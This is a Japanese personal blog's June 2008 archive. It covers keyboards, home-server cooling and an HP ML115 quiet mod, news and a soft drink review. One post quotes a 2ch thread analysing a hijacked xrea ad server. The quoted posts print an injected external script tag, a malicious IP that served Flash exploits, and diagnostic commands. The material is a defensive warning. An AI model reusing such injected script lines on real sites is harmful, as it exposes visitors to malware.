2008年6月アーカイブ

2008年6月27日

FILCO、Cherry製スイッチ搭載のテンキーレスキーボード

FILCO、Cherry製スイッチ搭載のテンキーレスキーボード(impress PC watch)

(゚∀゚)!!
事実上 RealForce しか選択肢の無かった(変態配列ではない)テンキーレスに、ついに新たな選択肢が!
黒茶かな無し日本語を1枚ずついっときます。日本語キーへのリハビリがやっと完了したところなので、敢えて英語は購入しない方向で。英語のテンキーレスは輸入以外に購入の手段がなかったから、更に貴重ではあるんですがね。

予備は二次ロット以降で。

ところで富士通さん、リベルタッチのテンキーレスは出してくれないんでしょうか・・・。

2008年6月23日

夏仕様

サーバラックを夏仕様にしました。
R0010594.JPG
と言ってもサイドカバーを開けてサーキュレータの風を直接当ててるだけですがね!
これが一番冷えます。
買ってきたのはHoneywellのHT-800という奴ですが、あまりの振動に下から苦情が来たので雑誌を敷いて使っています。この状態でもちょっと五月蝿いので、明日ハンズで振動を吸収してくれそうな何かを購入してきます。

ついでにROネタ。
精練でギャンブルやるなら、箱開けても一緒だろう・・・ということで。

続きを読む: 夏仕様

2008年6月16日

もろもろ復旧報告と hp ML115 に関して

いろいろダメになっていたのが一通り復旧したのでご報告。
日記もmixiからこちらのweblogに戻します。

まずトラブルの口火を切ったのが DNS サーバのHDD故障。6/13 の1時頃に帰宅するとHDDから嫌な音が出ており、すぐに対応に当たりました。物置から引っ張ってきた富士通のノートPCに大急ぎでCentOS5.1をブチ込み、なんとかサルベージしたファイルをこねくり回しながら同日7時に仮復旧。OSインストール中の待ち時間にNTT-XStoreでML115を発注。
翌14日の10時にML115が到着(!)し、これまた大急ぎでOSインストールを行って、翌15日の4時頃に完全復旧しました。時間が掛かったのは、ML115の騒音が思ったよりも大きく、静音化改造を行ったことと、ネットワーク周りの特に100Mスイッチがいい加減老朽化してきていたのでリプレースを行い、更に配線を全てやりなおして、まとめられる箇所はスパイラルチューブでまとめたりと、ついでに余分な作業をたっぷりやった影響です。かなりすっきり。
HDDはSeagateのST380815ASが標準搭載されていましたが、別途同じHDDを事前に2台調達していたので、OEM装着のほうを外し、セットで買った2台をLinux上でソフトウェアRAID1を組んで運用しています。敢えてこのゲロ安HDDを選んだのは言うまでも無くシングルプラッタだから。HDDの熱源になるスピンドルモータの負荷が少ないほうが、熱条件の厳しいマシンには良いでしょう。

そのまま運用していたところ、16日の夕方からWWWサーバの応答が無くなりました。今回はほとんどいじっていないサーバだったので、またHDDが逝ったのかと覚悟はしていましたが、自宅に戻るとCPUファンが唸りを上げているだけでHDDから異音は聞こえず、PRAMが吹っ飛んだだけで済んだので、恐らく熱暴走ではないかと思われます。とりあえず、扇風機を倉庫から出してきて風を当てた状態で運用することにします。

で、ML115のお話。
110Gdに続いて激安サーバ2台目ですが、こちらも非常によく出来たマシンです。自宅サーバとなると騒音が気になるのですが、そもそもそういう用途の製品ではないので仕方の無いところでしょう。問題のファンはCPUファン、ケースファンともにDELTA製で、寿命を延ばす方向にきっちりお金が掛かっているようです。ケースの剛性や、素の状態での静かさでは110Gdに一歩譲りますが、設置サイズではML115のほうが小さくまとめられている上に、ケースも黒系の色なので目に付かず自宅サーバ向けではないかと。

さっさと組み上げてラックに押し込んでしまったので写真は無いですが、静音化改造に使ったパーツだけでもリストアップしておきます。

背面ファン置き換え:
AINEX FA-8912S-BL(92mm→120mm変換) + RDL1225B
変換アダプタとケースの固定がちょっと甘めになりますが、そこは両面テープとかでうまく逃げます。マザーから生えてるファン電源は4PのPWM用なんですが、1ピン遊ばせて3Pを押し込んで使います。

CPUクーラー置き換え:
AINEX FA-812A(80mm→120mm変換) + RDL1238S-PWM
シンクはやたらコストが掛かってそうなので、ファンだけを交換します。こちらはPWM制御を利用したいので、ファンもPWM対応品を選びました。シンク自体が斜めにファンを固定する設計になっているので、横幅が増えたぶんシャドウベイの下2段は使えなくなります。

今のところこの状態でうまく動いてくれていますが、真価が問われるのは夏の昼間でしょうね。暫くは、やばくなったら自動シャットダウンするようにしておきますかね。

2008年6月12日

xreaの広告から感染する件について

仕事中なので簡潔に。
注意されたし>各位

xrea.com part131
http://pc11.2ch.net/test/read.cgi/hosting/1211121853/

504 :名無しさん@お腹いっぱい。 :sage :2008/06/08(日) 12:51:05 0
ちょっと聞いて欲しい。
無料のxreaの広告で、自動挿入じゃなくて自分で挿入する形式の奴あるよな。

<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com"></script>
<noscript><iframe height="60" width="468" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" allowtransparency="true" src="http://img.xrea.com/ad_iframe.fcg?site=xxx.sxxx.xrea.com">
<a href="http://img.xrea.com/ad_click.fcg?site=xxx.sxxx.xrea.com" target="_blank">
<img src="http://img.xrea.com/ad_img.fcg?site=xxx.sxxx.xrea.com" border="0" alt="xreaad"></a></iframe></noscript>

ってやつ。
これの<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com"></script>
が入ってると怪しげなIPにアクセスするんだが?
61.238.148.112 : 81
このIPは香港のIP。ぐぐると危険なIPっぽいんだが大丈夫なのか?
<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com">
を削除すると、広告はしっかり表示されるが、そのIPへのアクセスは無くなる。
自分以外のxrea借りてて<!--nobanner-->で広告位置変えてるサイトを見てみたが、
上のタグ入ってるサイトは全部そこへのアクセスがある。
<!--nobanner-->使わず自動挿入されるページはなんともないようだ。

604 :名無しさん@お腹いっぱい。 :sage :2008/06/11(水) 15:57:18 0
61.238.148.112ってhellh.netとかいう
ネトゲの垢盗むウィルス撒き散らしてる危険サイトのIPじゃない?
なんとなくググってみただけだけど

685 :666 :sage :2008/06/12(木) 10:33:11 0
解析終了!

>>666で/show.phpってファイルにアクセスしてるけど
これがFlashプレーヤーの脆弱性を突いたファイルを読み込ませようとしてる。
????.swf、???.swfやらが脆弱性を突いたファイルだと思われる。

Flashプレーヤーを最新版にしてれば問題ないとは思う。
サポ板に誰か報告しといて。


686 :666 :sage :2008/06/12(木) 10:40:04 0
ちなみにFlashプレーヤーのバージョン確認。
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

バージョンが9.0.124.0なら問題なし。
9.0.115.0以下だとヤバイかも。

694 :666 :sage :2008/06/12(木) 11:53:55 0
>>690
XREA.COMがなんかしてるんじゃなくて
「imgj.xrea.com」が乗っ取られてる。

C:\>nslookup imgj.xrea.com
Non-authoritative answer:
Name: j1.ax.xrea.com
Addresses: 202.181.97.140, 202.229.187.26, 210.153.116.18, 202.229.187.26
59.106.22.138, 202.181.97.153
Aliases: imgj.xrea.com

719 :名無しさん@お腹いっぱい。 :sage :2008/06/12(木) 15:24:52 0
for i in 202.181.97.140 202.181.97.153 202.229.187.26 210.153.116.18 59.106.22.138; do
echo $i; wget -qO- http://${i}/ad_iframe.html | md5sum; echo
done

202.181.97.140
061a0dbc17873ef1d655093b47eb5a93 -

202.181.97.153
bae3970b24cad8473cef20d8b7cd0085 -

202.229.187.26
061a0dbc17873ef1d655093b47eb5a93 -

210.153.116.18
061a0dbc17873ef1d655093b47eb5a93 -

59.106.22.138
061a0dbc17873ef1d655093b47eb5a93 -


202.181.97.153 だけ返ってくる内容が違うんですよ

723 :名無しさん@お腹いっぱい。 :sage :2008/06/12(木) 15:44:45 0
http:// 202.181.97.150 /

http:// 202.181.97.153 /

http:// 202.181.97.153 /ad_iframe.html
<SCRIPT LANGUAGE="Javascript" SRC="http://****:81/jp.js"></SCRIPT>

http:// 202.181.97.156 /


前後のIPアドレスを持つホストは同一ネットワーク上に存在するだろうと推定すると、
特定のサーバ(202.181.97.153)の特定のページ(ad_iframe.html)だけに、
外部のJavaScriptファイルを実行するようなコードが挿入されています
つまりネットワークは無関係だということです
単に一つのサーバだけの問題です
事実をろくに検証もせずに一点だけ捉えてただどこが悪いだのと述べるのは、
警告でも何でもなくてただの風評ですよ
ARPSpoofingだとか無責任に言っていた人間は切腹なさい

ニュース2つ

ぷらっとホームの本多のオヤジさんが逝去(slashdot.jp)

まだ若かったのに逝ってしまわれましたか。ソリティアやってる姿もそうですが、お店で探し物をしているとすぐに声を掛けてくれたのを思い出します。人柄の良さもあって、界隈では「ぷらっとの会長(or 社長)」ではなく「本多のオヤジ」と親しみを込めて呼ばれていましたね。(本多通商の頃のイメージもあるのでしょうが。)

個人的にもかなりお世話になった店だけに、非常に残念です。合掌。


iPhone新機種 ドコモ発売可能性なし(日テレNEWS24)

こちらも残念。
せっかくAppleがレベニューシェアをやめてインセンティブモデルにしたのに、日本ではこの1年でそれがダメになってしまった訳で。タイミングが悪かったですね。

様子を見て通信速度に問題がなければ(その前提からして難しいとは思いますが)、サブ回線で契約しますかね。そうなったらdocomoの定額はキャンセルってことで。

2008年6月 9日

ペプシ ブルーハワイ

恒例となりました今年の毒ペプシですが、近所のコンビニでフライング販売していたのを早速買ってきてみました。

ラベルにパイナップル&レモンと書いてある通り、ブルーハワイ味というよりパイナップル味が凄く強い感じ。レモンは弱いので、入ってませんといわれたら分からないくらいかも。ちなみに無果汁です。

去年の緑よりはうまいです。


---

ついでに。
各メディアでガンガンに報道されていて、今更私が言うこともないだろうということでスルーを決め込んでいた訳ですが、これは取り上げざるを得ない。

サバイバルナイフの規制強化検討 「本当に忌まわしい凶行」と官房長官

いや、そこじゃないだろう。
一国の官房長官という立場なら、それで何が解決するのか、考えてから発言してくれ。

2008年6月 4日

iPhoneはソフトバンクから

仕事中なので簡潔にシリーズ。

「iPhone」について - ソフトバンクモバイル株式会社

SBの貧弱なネットワークで、トラフィック捌けるのか、これ。
DoCoMoも継続して検討を進めていくとのことで、そっちが出たら買うよ、うん。

このアーカイブについて

このページには、2008年6月に書かれた記事が新しい順に公開されています。

前のアーカイブは2008年5月です。

次のアーカイブは2008年7月です。

最近のコンテンツはインデックスページで見られます。過去に書かれたものはアーカイブのページで見られます。